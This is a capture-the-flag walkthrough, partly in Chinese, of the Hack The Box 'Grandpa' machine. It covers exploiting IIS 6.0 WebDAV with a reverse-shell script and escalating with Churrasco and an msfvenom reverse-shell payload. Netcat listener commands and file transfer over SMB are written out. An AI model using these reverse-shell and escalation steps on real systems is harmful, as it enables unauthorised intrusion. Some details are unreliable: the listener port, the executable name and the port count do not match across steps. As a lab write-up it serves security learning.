[Hack The Box] Grandpa – writeup

💀 OS: Windows 💀 Difficulty: easy 💀 Vulnerability Arbitrary File Upload, Misconfiguration

Scanning and Enumeration:

nmap:

nmap -sC -sV -O 10.10.10.14

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 09:23 EDT
Nmap scan report for 10.10.10.14
Host is up (0.27s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Sun, 10 Sep 2023 13:23:46 GMT
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
..

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.83 seconds

三個端口是開啟:
80/tcp open http Microsoft IIS httpd 6.0
    http://10.10.10.14 打開之後顯示 Under Construction
    網站的伺服器是使用Microsoft IIS,WebDAV 協議

davtest:

工具介紹:https://zing.gitbooks.io/kali-lunix/content/06x/6x07_DAVTest.html
使用davtest測試可以使用哪些method
測試之後發現沒有任何method可以使用

davtest -url http://10.10.10.14

********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.14
********************************************************
NOTE    Random string for this session: rew4ZMFiMdVl8tu
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     html    FAIL
PUT     aspx    FAIL
PUT     php     FAIL
PUT     cfm     FAIL
PUT     asp     FAIL
PUT     shtml   FAIL
PUT     txt     FAIL
PUT     jhtml   FAIL
PUT     pl      FAIL
PUT     cgi     FAIL
PUT     jsp     FAIL

********************************************************

Exploit:

使用ii6_reverse_shell.py這份reverseshell
需要加上以下參數 1.Target IP 2.Target Port 3.Listener IP 4.Listener Port

rlwrap nc -lnvp 4444
python2 iis6_reverse_shell.py 10.10.10.14 80 10.10.14.5 4444

listening on [any] 5555 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
nt authority\network service

Privilege Escalation:

churrasco.exe : wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8888 -f exe -a x86 --platform windows -o shell.exe

impacket-smbserver share .
移動到 C:\WINDOWS\Temp 才有權限傳送檔案至受害機
copy \\10.10.14.5\share\churrasco.exe .
copy \\10.10.14.5\share\shell.exe .

開始提權!
rlwrap nc -lnvp 8888
churrasco.exe "privesc.exe"

Get FLAG:

C:\Documents and Settings\Administrator\Desktop>type root.txt
9359e905...
C:\Documents and Settings\Lakis\Desktop>type user.txt
bdff5ec6...